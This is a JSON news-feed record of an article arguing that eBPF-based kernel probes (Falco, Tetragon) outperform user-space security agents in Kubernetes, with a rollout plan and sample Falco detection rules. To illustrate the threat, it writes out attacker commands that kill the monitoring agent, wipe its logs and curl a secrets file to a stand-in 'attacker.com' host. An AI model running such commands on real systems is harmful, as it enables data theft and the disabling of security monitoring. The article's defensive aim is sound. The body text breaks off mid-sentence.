{"slug": "article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "title": "Article: Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability", "summary": "User-space security agents are structurally flawed because they share the same privilege level as the processes they monitor, allowing attackers with root access to simply kill the agent or erase logs. It explains that eBPF solves this by attaching probes directly to the Linux kernel's syscall interface, providing visibility that a container-level attacker cannot disable. The piece also notes that replacing multiple user-space agents with a single eBPF-based solution can reduce security-related CPU consumption by 60-80% and that production-ready tools like Falco and Tetragon are available today.", "body_md": "Key Takeaways\n- Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed.\n- eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires escaping to the host kernel, which is a far harder problem than running\nkill -9\n. - Replacing a stack of user-space security agents with a single eBPF-based agent can cut security-related CPU consumption by 60-80%, and the telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per-GB for.\n- Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service.\n- Falco (CNCF graduated) and Tetragon (Cilium sub-project) are production-ready today. You do not need to write kernel code to get started.\nIntroduction\nLast year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible.\nThe attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant kill -9\non the agent, truncate\non the log files, and then free rein. Fileless payloads via memfd_create()\nnever touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup.\nThat write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it.\nThis article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now.\nThe Problem with User-Space Security Agents\nLiving at the Same Privilege Level as the Threat\nMost Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch.\nFigure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. (Original diagram by the author)\nThis architecture has a fundamental issue: the security agent and the attacker operate at the same level. With root in the container, an attacker can:\n$ kill -9 $(pgrep security-agent)\n$ truncate -s 0 /var/log/agent/*.log\n$ curl http://attacker.com/exfil -d @/etc/secrets\nNo alert ever fires because the agent was dead before anything interesting happened.\nThe CPU Tax\nUser-space agents also impose real cost. To inspect network traffic they proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting.\nWhat Attackers Know\nCapable adversaries specifically target these gaps. memfd_create()\nlets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores. Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy.\nHow eBPF Changes the Equation\nThe Short Version\neBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism (hence \"Berkeley Packet Filter\"), the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security:\n- A built-in verifier statically analyzes every eBPF program at load time, proving it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. Zero runtime cost, zero risk of a kernel panic.\n- eBPF programs execute in kernel context with direct access to kernel data structures. No user-kernel context switches, no proxy overhead.\n- You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints.\nThe Verifier Deserves Its Own Paragraph\nRunning custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified. A buggy module can panic the machine. eBPF's verifier removes that failure mode entirely. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth (capped at 512 bytes). All statically, all before the program loads.\nThe verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale.\nWhere the Probes Sit\nFor security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations.\nFigure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. (Original diagram by the author)\nWhen any process calls connect()\n, execve()\n, or open()\n, the probe captures the syscall arguments, process/thread IDs, container ID, Kubernetes pod metadata, user ID, capabilities, and the parent process chain. Because the probe runs in kernel context, an attacker with root inside a container would need to escape to the host kernel to tamper with it. That is a completely different class of problem compared to killing a user-space process.\nThe Cost Story\nOrganizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads.\nFigure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. (Original diagram by the author)\nThere is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial.\nKernel Compatibility\nThe features that matter for production security landed across kernels 4.15 through 5.7:\nMost production Kubernetes distributions ship with 5.4+, so kernel support is rarely a blocker. Worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution.\nRolling It Out Without Breaking Production\nDo not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem.\nFigure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. (Original diagram by the author)\nPhase 1: Watch and Learn\nDeploy an eBPF agent (Falco or Tetragon) as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts:\nspec:\nhostPID: true\nhostNetwork: true\ncontainers:\n- name: agent\nimage: falcosecurity/falco-no-driver:latest\nsecurityContext:\nprivileged: true\nvolumeMounts:\n- name: bpf-fs\nmountPath: /sys/fs/bpf\n- name: kernel-debug\nmountPath: /sys/kernel/debug\nreadOnly: true\nFalco's Helm chart handles the full DaemonSet config. For a first deployment, start there.\nDuring this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles.\nPhase 2: Alert on Anomalies\nNow write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal.\nA Falco rule for unexpected process execution in a payment service:\n- rule: Unexpected Process in Payment Service\ndesc: Detect execution of binaries not in the approved list\ncondition: >\nspawned_process and\ncontainer.name startswith \"payment-\" and\nnot proc.name in (java, jcmd, jstat)\noutput: >\nUnexpected process executed in payment container\n(user=%user.name container=%container.name\nprocess=%proc.name cmdline=%proc.cmdline\nparent=%proc.pname)\npriority: WARNING\ntags: [container, process, payment]\nAnd one for metadata service access, which is almost always a sign of trouble:\n- rule: Container Accessing Cloud Metadata Service\ndesc: Detect attempts to access instance metadata\ncondition: >\noutbound and\nfd.sip = \"169.254.169.254\" and\ncontainer.id != host\noutput: >\nContainer attempted metadata service access\n(container=%container.name pod=%k8s.pod.name\nnamespace=%k8s.ns.name dest=%fd.sip)\npriority: CRITICAL\ntags: [network, cloud, metadata]\nSpend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios.\nPhase 3: Enforce\nWith high confidence in your detection rules, enable active blocking. Tetragon can use bpf_send_signal()\nto SIGKILL a process before the offending syscall completes. Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow.\nA typical enforcement scenario: a container calls connect()\nto 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached.\nThis phase demands discipline. A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability.\nTooling: Falco, Tetragon, and the Vendors\nFalco is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more.\nWhat I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between \"process X called connect()\nto 169.254.169.254\" and \"the payment-api\npod in prod\nnamespace tried to reach the cloud metadata service\" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert.\nFor active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon. It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack. Commercial vendors like Sysdig, ", "url": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "canonical_source": "https://www.infoq.com/articles/ebpf-for-security-observability/?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global", "published_at": "2026-05-19 09:00:00+00:00", "updated_at": "2026-05-19 21:47:47.045211+00:00", "lang": "en", "topics": ["cybersecurity", "open-source", "cloud-computing", "developer-tools", "enterprise-software"], "entities": ["eBPF", "Falco", "Tetragon", "Cilium", "CNCF", "Linux", "Kubernetes"], "alternates": {"html": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for", "markdown": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.md", "text": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.txt", "jsonld": "https://wpnews.pro/news/article-kernel-level-ground-truth-why-ebpf-is-replacing-user-space-agents-for.jsonld"}}